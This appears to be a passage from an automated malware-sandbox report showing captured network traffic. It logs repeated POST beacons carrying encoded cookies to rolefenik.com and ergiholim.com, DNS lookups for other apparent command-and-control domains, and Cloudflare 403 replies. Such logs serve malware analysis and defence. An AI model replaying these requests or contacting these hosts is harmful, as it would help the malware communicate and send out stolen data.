            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QiBY1SuUm/CP68lRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: ergiholim.comContent-Length: 92Cache-Control: no-cache
            Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: C:\Windows\explorer.exeCode function: 8_2_02E05078 InternetReadFile,8_2_02E05078
            Source: global trafficDNS traffic detected: DNS query: burjog.com
            Source: global trafficDNS traffic detected: DNS query: samomol.com
            Source: global trafficDNS traffic detected: DNS query: rolefenik.com
            Source: global trafficDNS traffic detected: DNS query: ergiholim.com
            Source: unknownHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: j5K0WwQy8E33yTF34zGCp9roEsjpoiNAoqVrM6qUFZ36/gzvOdfw9zrDDeBYya4IuV6qNzmNiQqUfYahC2lLVTbqt5XyVp0hwvbK2vnNUAAtGlXVM+D42Mk4NuWCyI1ck1nRJs/qrYn5hAe/Z5FE3vPakI1pZgM9QjdF3ieakfKP7clRUkQ=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: rolefenik.comContent-Length: 92Cache-Control: no-cache
            Source: global traffic HTTP traffic detected: HTTP/1.1 403 Forbidden
                Date: Wed, 13 Nov 2024 17:21:35 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J07vdHmpTbgXkpU0PT%2FSrvVfERHCS%2FTR%2Fxulfo6PY7tBjXcE4LmIrekqqblqQjd%2FwRtqQGixEER2CCRXuKpZZEiEA9ACPwRJjedptWI%2FYHMI4pHFIfEvVDC%2F5kxgjfVZ"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 8e2070645cb9f9ea-SJC
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=41334&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=70093&cwnd=32&unsent_bytes=0&cid=ded42fc163fc42e5&ts=542&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wlGxf%2BGx%2FDm7xhKQsFSkoDUs6HHfZCHK%2BAYx7K9xEnJKoTmMtSXq%2BzJnRwG1wbdDxVPyKnpdD6gov5mv5aZx%2F%2B1q%2F6AMdEZga08auoxynq8nhWRKfcRYIRLwy3sn9y%2F1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e207213696650d8-BODalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=114495&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=25300&cwnd=32&unsent_bytes=0&cid=020e660828833674&ts=525&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8irEKmTOZqI9GT1%2Fi4ivCm1%2FktY1QM9j4E058tFjJ0meN69YUCrFbVXJ%2FFKaBb1aYaJKnm2Gsyzy5E0zTukDsKaagc6WoDNnu2tWqXD09KBYnigAheRaAnsFRVb2Ff2y"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20721b88ea685a-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=171015&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=20061&cwnd=32&unsent_bytes=0&cid=7a1ede1f5e5229a1&ts=793&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OHaq2CNWANcNurjJGs9Ja4p6dtRPGMa5spfj5lRTwUJyuz71DOdOo6HeirIlMkjM3PKe1s9CqosLR0VE8DdQkonFPMKZGIjQOc9kknnfw0viXYPA%2BZXfjCVvlkQHeMia"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072248c38fa05-SJCalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=41184&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=70223&cwnd=32&unsent_bytes=0&cid=0e647d344df4be39&ts=494&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d2UylY2yyLd8krg4QAWQA7%2FMpDEEDflZiGfmWW2%2FUGhAsHGoDq0kxc4N8Y6sMvVX8J42CceKjFqTF5%2Fy6nLzUK2mSMFfwmYHkYYsN7rarGwUlDNFUZCjC0C3w03AelW6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20722c09d3c997-IADalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=38217&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=75835&cwnd=32&unsent_bytes=0&cid=fac6eaae224df6ed&ts=378&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kyUeVC7pn%2BgIuEr6wGwsbUPMkVimrai8OwfULubgUOjsW13vRpxADbw2DUgMQcaVovQdwKkBdGR%2Fqmkh5dt83t8UWvd%2BdAPonVy3KT423bou1ZDM%2FOa8R%2FCVn4nrHdB3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072346d842089-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=158042&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=20104&cwnd=32&unsent_bytes=0&cid=37b8b5597b73db18&ts=826&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:51 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u1D%2B2uFAu8wuBJoGf8cRuydwJSBoEZK%2BfqDJsqohKH%2BtBflxiouudMXTOXtKuBeulOwApCadRnzy9AUwEbhRI5T4Dph6imPDsooD1kCVYsoPqsCRLct5Dw8uQiCWcCwH"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20723f7ccfd773-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=149219&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=18709&cwnd=32&unsent_bytes=0&cid=9e747e29bab49cac&ts=533&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=00Cl7wKBZ7yV9cbh0d4dK5aSn4k9yT1wMhtcNQ7RqPFHdpq9f9Ahf%2FdZH1bUTbutbKDy3nFHEnSIHcQ%2FFl1STYfj5O39yCLkrTb4SKd6Rw%2Fr0GLwMvrgOe0DBVXR3Wz1"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e207246286f2c86-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1512&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=2023759&cwnd=235&unsent_bytes=0&cid=330b978d0d1a4d06&ts=309&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6cIsHCbJE1VTrBXvCfTIouycG0j8PfXHS8JKqwP5QVmLktwEth5RAJUIcUJKCpomc%2Bd0yLm7xrI6XzMXVyfKDIUx%2FUGD0ZXYoYuOf09XFVDay3AdeFLOrf13bHMQYbhA"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20724ebc837372-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=166823&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1167&delivery_rate=14790&cwnd=32&unsent_bytes=0&cid=00d9681dae08b3b4&ts=582&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=monfumrc7VHXqkomkrIvIZe%2FRHjcZyB2TZSs9dS43RiCxTOCNj8VRp1LzP8Txlrlgln01y%2BzU8BYDpgHBmgMsqh470SpVZSr3iC02G0nUV9nnBJKXDTHC2GK9FpzC410"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072578bd8d761-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=137573&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=21049&cwnd=32&unsent_bytes=0&cid=e53bcc705fcab88e&ts=1241&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F6pYaYF214rnQtg64g8L6p6AL9LspkjxnVvl%2FId2AYBLSJKWi1rxSX2LydKU2wcH%2FAmVntqpdHvWcQlbcycetsatnHuovII783CcJR6KbhyFFEHacZ%2BzitzPNyBDLVMC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072636a6bc979-IADalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=33447&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=86626&cwnd=32&unsent_bytes=0&cid=da1362e8537745c5&ts=286&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:22:59 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XGHHpDIDBXY2ts8C6KRtMUd%2FdgBdVjj%2BDKak8YTJ1m77jf7JQm82kt0wP7Rftyn6Ymu0toZMQo6YMFKYs6Ux2Z3i90PCwHVCdmYMT8W89Wp6UHAmfpPE6nCTCN4dJe57"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20726efa546b06-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1313&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1167&delivery_rate=2360228&cwnd=236&unsent_bytes=0&cid=6e26bb5a99c475d5&ts=1426&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=53FK1MbVdP2exh9R30Zbk6wUIj0r9cdGiJEouY9XFL5YFoYuayPQEQL0%2FLNzqWzw72Zgu5iDF%2FzsHbFIk04nzdwXPVMZ%2BOFncGxuZnHtrCrDQRcNzUeFnZJz3fHaFz8n"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072779d65d744-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=130818&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1167&delivery_rate=22142&cwnd=32&unsent_bytes=0&cid=56f90b16cfacd2ba&ts=505&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sDwovdz1JJdMtieF51S4hW2OaKNbVPuLAZv1W8B6JSTPqDI9%2FrSNtPu2IaPoEqdX5ERzePuHxLiLxr1pv%2Fee9N%2BTFjwRZruV2KzxaDDkoYuYsaD39Mtsh9WOVOUebuY9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e207281082f230e-SJCalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=41539&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=69692&cwnd=32&unsent_bytes=0&cid=4f6311489d8c8a45&ts=649&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:03 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8tFLPmqI799PnVeBOrq5G5ZXAMN6sjSzNTOcBhKuiHacpHIge4bmsDB7A6gBXEQ9I5TCD6VzQUzpKjQ23r2YwtumxUU5xw99TerBLalDxEsW1QvmHoUGFJQieEjbSOd7"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20728b5edfd773-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=137262&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=21077&cwnd=32&unsent_bytes=0&cid=0dc08ebf919023c0&ts=507&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:05 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0nSy34c9HeRGYq1rso4OjG3DbafnyF3HcR4LJzS6%2B8EkflOWT1vQ2dPE1xON9f30KM0IzfEgx%2FN9sDiVeDEdii1NoYMzM3f0a%2Fw1toPlx9AVinICfYUm9EmcwwQkXE36"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072932fe9c991-IADalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=33698&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=85843&cwnd=32&unsent_bytes=0&cid=242a4841e244cbd9&ts=379&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ugTmQJwoSTRLngQursOqTYXHNAD%2FbK3wnmoQwVwbfcW4W%2BQ9B0WoxujjHmJ4eg5tRu0HHaxBaXQ5u7oAS7veuAeSl%2BzgSREM22vjTQkjj5VHRnWm1ZplJXGUeZDLeg24"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e20729d987ad754-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=142391&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=18051&cwnd=32&unsent_bytes=0&cid=353bf2596d3dc2ed&ts=868&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xtKpxvxrnx3yBfmjwSLQcAOLxc520cXHDYngWBt5NM8LaldTRbJXWrV5v1aRMWaaSCtHfBaAzZuSm96b9RnA3aJAfsNAANF1wMeBmdJHB5oxnbKRrI%2BUYWPnjNwYfPet"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072a68da0d788-NRTalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=137469&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1167&delivery_rate=21056&cwnd=32&unsent_bytes=0&cid=d54b3113894ee5f0&ts=550&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 13 Nov 2024 17:23:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=acQqXazriKixtSRErgKXYHINiJgj84YMNHGkGFYHNJungNXei4EnEFzpSwIR6R9bTvyCoqoNNLXd6yE5eyqtlX%2FZLhwz0vrnKs%2Fu4ktygz8gWlbcfdc03yaxksnNVAqU"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e2072adfc01c9ad-IADalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=34535&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1167&delivery_rate=83883&cwnd=32&unsent_bytes=0&cid=32c78d7787abab5b&ts=276&x=0"
